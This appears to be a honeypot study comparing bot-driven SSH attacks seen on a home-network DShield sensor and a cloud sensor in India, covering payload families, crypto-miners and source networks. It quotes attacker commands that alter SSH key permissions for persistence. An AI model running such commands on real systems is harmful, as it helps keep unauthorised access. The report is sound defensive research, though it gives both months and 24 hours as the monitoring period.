Attack Observation Report: Comparison Project
Executive Summary
After monitoring a few months of attacks on my home network's [1]DShield honeypot, it became evident that most of these incidents were driven by automated scripts or bot behavior, with most sessions concluding within a minute. While this provided some insight, the predictability and repetitiveness of these attacks limited the depth of engagement and analysis. I deployed a second honeypot on [2]Digital Ocean, strategically located in Bangalore, India, to determine whether a different environment might attract more varied or sophisticated attacks. The goal was to explore whether this new setting would yield differences in attack patterns, techniques, or threat sources. A comparison of these two environments uncovered similarities and differences.
Comparison of Honeypot Environments
Home Network Honeypot:
- Total Attacks: 97
- Most Common Commands Executed: 22 commands (in 68 sessions)
- Common Payload: [3]trojan.shell/malkey
- Notable IP Sources: France Telecom, SpaceX Starlink
Digital Ocean Honeypot:
- Total Attacks: 110
- Most Common Commands Executed: 22 commands (in 53 sessions)
- Common Payloads: trojan.shell/malkey, ELF-based miners
- Notable IP Sources: Swisscom, SKB-Enterprise
Key Observations
1. Attack Frequency and Distribution
- Home Network Honeypot:
- Recorded 97 distinct attack sessions over the monitoring period of 24 hours. The attacks were consistent, mostly automated, and repetitive, indicating a high prevalence of bot-driven behavior.
- Digital Ocean Honeypot:
- Recorded a slightly higher number of attack sessions at 110. The increase could be due to its more exposed and globally accessible environment, but not a significant difference.
2. Command Execution Patterns
- Home Network Honeypot:
- The most common command sequence involved 22 commands in 68 sessions, focusing on establishing persistence by modifying SSH configurations. Commands like
chattr -ia .ssh
andchmod -R go= ~/.ssh
were common, aiming to secure unauthorized access.
- The most common command sequence involved 22 commands in 68 sessions, focusing on establishing persistence by modifying SSH configurations. Commands like
- Digital Ocean Honeypot:
- I also saw 22 command sequences, but they were more diverse. Additional commands were noted, especially those related to deploying [4]ELF-based cryptocurrency miners, indicating more complex attack strategies.
3. Payload Diversity
- Home Network Honeypot:
- Predominantly deployed trojan.shell/malkey, which is aimed at unauthorized SSH access by inserting malicious keys. A minor variation involved [5]trojan.ircbot/shell, but the attackers were consistent overall.
- Digital Ocean Honeypot:
- Encountered a broader range of payloads, including ELF-based miners like [6]miner.r002c0dgm24/xmrig, suggesting that attackers targeting cloud-based infrastructure are more resourceful or looking to leverage the characteristics of expanding cloud assets.
4. Geographical and ASNAME Information
- Home Network Honeypot:
- Attack traffic primarily originated from providers like France Telecom and SpaceX Starlink, with a more concentrated geographic spread, reflecting the limited exposure of a home network.
- Digital Ocean Honeypot:
- Attracted a more geographically diverse range of attacks, with IPs from Swisscom and SKB-Enterprise, indicating broader appeal and exposure to the cloud-based environment.
5. Malware and Threat Intelligence
- Home Network Honeypot:
- The consistent use of trojan.shell/malkey highlights the automated nature of the attacks, leveraging known and reliable scripts for persistent unauthorized access.
- Digital Ocean Honeypot:
- Encountered newer and varied malware, including ELF-based miners, often used for illegal cryptocurrency mining on cloud servers. Detecting recent payloads suggests that attackers targeting cloud infrastructure are more current with current trends.
Conclusion
This experiment demonstrates that a honeypot's environment influences the types and diversity of attacks it attracts. With its cloud-based infrastructure and geographic placement, the Digital Ocean honeypot encountered more varied and sophisticated threats compared to the more predictable attacks on the home network honeypot. This highlights the importance of considering environmental factors in cyber threat analysis and defense strategy development. The broader geographic range and diversity of attack tools seen in the Digital Ocean honeypot suggest that cloud-based systems, due to their high-value infrastructure, may attract more advanced and varied threats, underscoring the need for robust and adaptable security measures in such environments.
References
[1] DShield Honeypot
[2] Digital Ocean